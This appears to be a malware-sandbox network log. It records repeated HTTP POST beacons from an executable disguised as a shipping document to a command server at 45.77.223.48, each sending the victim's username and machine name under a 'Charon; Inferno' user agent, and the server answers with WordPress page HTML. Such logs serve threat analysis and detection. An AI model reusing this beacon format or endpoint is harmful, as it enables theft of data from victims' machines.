Apr 25, 2024 09:43:34.042083025 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 25, 2024 09:43:34.042227983 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 25, 2024 09:43:34.042278051 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.4	49825	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:43:34.305329084 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 149 Connection: close
Apr 25, 2024 09:43:34.431329966 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 25, 2024 09:43:35.267355919 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:43:34 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:43:35.267420053 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 25, 2024 09:43:35.267494917 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:43:35.276050091 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:43:35.276364088 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 25, 2024 09:43:35.276539087 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 25, 2024 09:43:35.276633024 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 25, 2024 09:43:35.276987076 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 25, 2024 09:43:35.277004957 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 25, 2024 09:43:35.277136087 CEST	1289	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.4	49826	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:43:35.562439919 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 149 Connection: close
Apr 25, 2024 09:43:35.692501068 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 25, 2024 09:43:36.506069899 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:43:35 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:43:36.506160021 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 25, 2024 09:43:36.506342888 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:43:36.516060114 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:43:36.516546011 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 25, 2024 09:43:36.516798973 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 25, 2024 09:43:36.516978979 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 25, 2024 09:43:36.517076015 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 25, 2024 09:43:36.517198086 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 25, 2024 09:43:36.517224073 CEST	1289	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.4	49827	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:43:36.805880070 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 149 Connection: close
Apr 25, 2024 09:43:36.933487892 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 25, 2024 09:43:40.748475075 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:43:36 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:43:40.748600006 CEST	22	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 Data Ascii: <!DOCTYPE html><html
Apr 25, 2024 09:43:40.748936892 CEST	12	IN	Data Raw: 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 Data Ascii: lang="en-US"
Apr 25, 2024 09:43:40.749048948 CEST	25	IN	Data Raw: 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: ><head><meta charset="
Apr 25, 2024 09:43:40.749372959 CEST	5	IN	Data Raw: 55 54 46 2d 38 Data Ascii: UTF-8
Apr 25, 2024 09:43:40.749569893 CEST	6	IN	Data Raw: 22 20 2f 3e 0a 09 Data Ascii: " />
Apr 25, 2024 09:43:40.749623060 CEST	71	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: <meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:43:40.758192062 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:43:40.758508921 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 25, 2024 09:43:40.758635998 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.4	49828	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:43:41.014214039 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 149 Connection: close
Apr 25, 2024 09:43:41.145092964 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 25, 2024 09:43:42.280194998 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:43:41 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:43:42.280249119 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 25, 2024 09:43:42.280909061 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:43:42.288948059 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:43:42.289463997 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 25, 2024 09:43:42.289578915 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 25, 2024 09:43:42.289697886 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 25, 2024 09:43:42.289897919 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 25, 2024 09:43:42.289948940 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 25, 2024 09:43:42.289964914 CEST	670	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.4	49829	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:43:42.568420887 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 149 Connection: close
Apr 25, 2024 09:43:42.698106050 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 25, 2024 09:43:43.526289940 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:43:42 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:43:43.526346922 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 25, 2024 09:43:43.526410103 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:43:43.535242081 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:43:43.535674095 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 25, 2024 09:43:43.535784006 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 25, 2024 09:43:43.535896063 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 25, 2024 09:43:43.536047935 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
